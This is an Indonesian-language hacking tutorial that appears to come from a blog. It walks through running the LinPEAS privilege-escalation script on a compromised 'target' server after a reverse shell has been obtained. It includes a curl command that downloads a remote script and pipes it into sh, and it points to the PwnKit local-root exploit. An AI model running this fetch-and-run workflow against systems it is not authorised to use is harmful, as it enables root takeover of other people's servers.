Pagi Sobar IT...
Kembali Lagi Dengan AoiCyber Kali Ini Kita Akan Belajar Bersama" Mengenai Tools LinPEAS.
Jadi Apa Itu LinPEAS ?
LinPEAS Adalah Sebuah Script Yang Di Buat Menggunakan Bahasa Bash, Dan Fungsi Dari LinPEAS Sendiri Adalah Untuk mencari kemungkinan jalur untuk meningkatkan hak istimewa di host Linux/Unix*/MacOS.
Simpel Nya Begitu
Jadi Ketika Kita Telah Mendapatkan Akses Shell Ke Target Dan Telah Melakukan BackConnect Reverse Shell Maka Kita Tentunya Perlu Mengecek Apakah Kita Dapat Menaikkan Hak Kita Menjadi Hak Istimewa ( ROOT ) , Atau Biasa Disebut "Privilege Escalation".
Dan Tanpa Berlama" Mari Kita Praktek Kan Bersama".
Pertama Kita Pastinya Harus Melakukan BackConnect Reverse Shell Terlebih Dahulu, dan Jika Ada Yang Belum Tau Bagaimana Caranya BackConnect Reverse Shell Mungkin Next Saya Akan Posting Disini Bagaimana Cara Backconnect Reverse Shell Dengan Mudah ,Dan Sekalian Juga Saya Akan Beri Tahu Bagaimana Caranya Bypass Backconnect Reverse Shell Dll.
Jika Sudah Melakukan BackConnect Silahkan Kalian Copy Dan Pastekan Command Dibawah Ini Ke Terminal Kalian :
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Jika udah Kalian Tekan Enter ,Dan Jika Dari Kalian Ada Yang Mengalami Kendala Seperti Curl Disable ,Pas Kalian Run Malah Blank Gak Muncul Apa" ,Kalian Bisa Mengunduh Langsung Script LinPEAS Dibawah Ini :
>HERE<
Dan Kalian Upload Ke Server Target ,Lalu Kalian Balik Lagi Ke Terminal Kalian Dan Ketikkan :
bash linpeas.sh
Maka Akan Muncul Output Seperti ScreenShoot Dibawah Ini
Disitu Kalian Bisa Lihat Bahwa Tools LinPEAS Ini Akan Melakukan Scanning Terhadap System ,Tools LinPEAS Ini Nantinya Akan Memberi tahu Ke Kalian Apakah Kalian Bisa Menaikkan Hak Kalian Menjadi Hak Istimewa ( ROOT ).
JIka IYA, Maka LinPEAS Akan Memberikan Kalian Link Reverensi Untuk Kalian Menaikkan Hak Kalian Menjadi Hak Istimewa ,Dan Hebatnya Lagi Tools Ini Sudah Dilengkapi Alamat" Link Sesuai Kerentanan Yang Di Temukan ,Jadi Kalian Tidak Perlu Mengecek Nya Satu / Manual .
Dan Sebagai Contoh LinPEAS Telah Selesai Melakukan Scanning Dan Kita DiBeri Tahu Bahwa Server Target Rentan Terhadap Exploit CVE 2021-4034 Yaitu PwnKit ,Maka Kita Akan Di Beri Sebuah Alamat Link, Yang Dimana Pada Link Tersebut Terdapat Sebuah Tools / Biasa Disebut LocalRoot ,Untuk Kita ,Agar Kita Bisa Menaikkan Hak Kita Menjadi Hak Istimewa ( ROOT ).
Dan Tentunya Disitu Sudah Ada Petunjuk Bagaimana Kita Bisa Menggunakan Alat Tersebut ,Jadi Kalian Tidak Perlu Repot" Untuk Mengeck Versi Sudo ,Pkexec ,ldd, gcc dll.
Bagaimana Mudah Dan Simpel Bukan ?
Yahh Walaupun Tools LinPEAS Ini Tidak Bisa Ataupun Belum Bisa Melakukan Rooting Server Secara Otomatis Senggaknya Mereka Sudah Berusaha Untuk Membantu Kita:)
Mungkin Kalian Bertanya":
Bang Ada Gak Sih Tools Dalam Bahasa Pemrograman bash,php,python dll ,Yang Bisa Auto Rooting Server ?
Dan Jawabannya Adalah "ADA" Dan Tentunya Susah DiCari ,Kalaupun Kalian Nemu Pastinya Harus Bayar wkwk, Kalau Saya Sendiri sih Lebih Suka Menggunakan Tools" Kek LinPEAS Exploit Suggester dll.
Dan Jika Kalian Bertanya Apa Fungsi Rooting Server ,Next Mungkin Gw Bikin Artikelnya Kalau Ada Waktu Kosong.
Yahh Mungkin Cukup Sampai Disini Saja Dan Terima Kasih.
